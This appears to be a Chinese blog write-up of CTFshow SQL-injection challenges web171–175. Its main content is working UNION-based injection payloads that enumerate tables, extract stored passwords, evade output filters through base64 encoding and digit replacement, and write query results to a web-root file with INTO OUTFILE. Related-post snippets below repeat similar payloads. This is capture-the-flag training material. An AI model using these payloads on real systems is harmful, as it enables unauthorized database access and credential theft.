CTFshow web(sql注入171-175)

最新推荐文章于 2024-07-31 22:57:22 发布
最新推荐文章于 2024-07-31 22:57:22 发布
阅读量866 收藏 18
点赞数 8
文章标签: linux 运维 服务器 CTFshow SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/136160174
版权
本文讲述了在WebCTF挑战中,如何利用SQL注入技巧获取表名,绕过过滤函数,对密码进行Base64编码混淆,以及如何通过文件操作来提取隐藏信息的过程。
摘要由CSDN通过智能技术生成

                                                                 web171

还得先爆表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

注意这里已经提示你了,只要知道是ctfshow_user,就可以拿到flag

-1' union select 1,2,password from ctfshow_user where username = 'flag' --+

                                                                         web172

还是那个语句查询表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

然后接着一个个查询看看哪个表里面有flag,经测试,第二个表有flag 

-1' union select 1,2,password from ctfshow_user2 where username = 'flag' --+

                                                                        web173

还是那个语句查询表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

那个过滤函数别被骗了,照样该怎么做怎么做 

-1' union select 1,2,password from ctfshow_user3 where username = 'flag' --+

                                                                    web174

根据upstream_yu大神的思路:

替换:将数据to_base64加密,然后将里面所有的数字用replace()替换

-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),2,'testb') ,3,'testc') ,4,'testd') ,5,'teste') ,6,'testf') ,7,'testg') ,8,'testh') ,9,'testi') ,0,'testj') ,1,'testa'),replace(1,'1','testa') from ctfshow_user4 where username='flag'--+

base64解码就好

                                                                    web175

原理:把内容写入文件读取

 1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

 然后访问1.txt

ps:注意把ctfshow后面的都删去,改成1.txt

真心希望文章能够帮助大家,谢谢!

补天阁
关注
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 378
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 310
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFSHOW web入门——web172
m0_74093152的博客
03-26 341
知道了数据库名字是ctfshow_web,有ctfshow_user和ctfshow_user2两张表。1’ order by 2--+的时候没有报错,而3的时候报错,说明该表有两列。有三个列id,username,password。首先判断有无注入点,页面有变化,因此存在注入点。接着查询ctfshow_user2中的列。查询password中的数据。
ctfshow-web入门-sql注入web171-web175
最新发布
Welcome To Myon'Blog !
07-31 1297
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
CTFshow web入门web172-sql2
weixin_74336671的博客
11-15 182
直接:' union select 1,password from ctfshow_user2 where username='flag'--+返回结果中的username不允许等于flag,不输出username不就完事了,这里应该过滤ctfshow才有意义。
CTFshow-web入门171sql注入
Hunter909的博客
10-12 160
username若是对于flag就会被屏蔽、隐藏(没有办法去改变username!=flag),但是会发现ID排序是有顺序的,就可以慢慢试id = 25,id = 26......发现id=26时,flag会出来。因为$sql = "select username,password from user where username!这里是具有sql注入漏洞的,它这里没有限定条件,直接运用简单的sql注入把隐藏的flag找出来就行。
CTFSHOW web入门——web171
m0_74093152的博客
03-26 442
查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+然后查询库名 1' union select 1,2,database() --+首先查询有多少列,1' order by 3--+查看ctfshow_web库的表。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7255
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4477
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
ctfshow web171-174
akxnxbshai的博客
03-05 5020
Web 171 打开发现以下内容。 看到了一个查询语句,于是认真看了一下。 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 直接传入1,代码会变成 select username,password from user where username !='flag' and id ='1' li
CTFshow web入门web171-sql1
weixin_74336671的博客
10-25 145
说明到3就没有了,直接进行union查询 (此时将1改为-1)本题考察sql注入联合查询union select。继续到1‘ order by 4--+首先我们试着注入1‘ and 1=1’继续到1‘ order by 3--+回显异常,说明存在注入。
ctf.show的SQL注入(web171-web253)
热门推荐
wanan的博客
09-30 1万+
ctf.show的SQL注入(web171-web253)
CTFshow--web入门(171-184)
2402_82963715的博客
07-28 1370
CTFshow--web入门171-184的wp。
CTFshow_Web_SQL注入——web171~web190
Ho1aAs‘s Blog
04-08 1863
文章目录题解web 171web 172web 173web 174web 175web 176web 177web 178web 179web 180-182web 183web 184web 185-186web 187web 188web 189web 190完 题解 web 171 基础 [GET]PAYLOAD: ?id=0' union select 1,2,password from ctfshow_user where username='flag' --+ web 172 过滤 flag
ctfshow sql注入 web171-web253 wp
mumuzi的博客
02-02 7753
存货,别说我卷了
ctfshow sql注入 171~
shinygod的博客
03-30 719
ctfshow sql 爆表:-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web";--+ 爆列:-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_nam
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2497
ctfshow,SQL注入的wp
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了防止SQL注入攻击,应该使用参数化查询并对用户输入进行严格验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值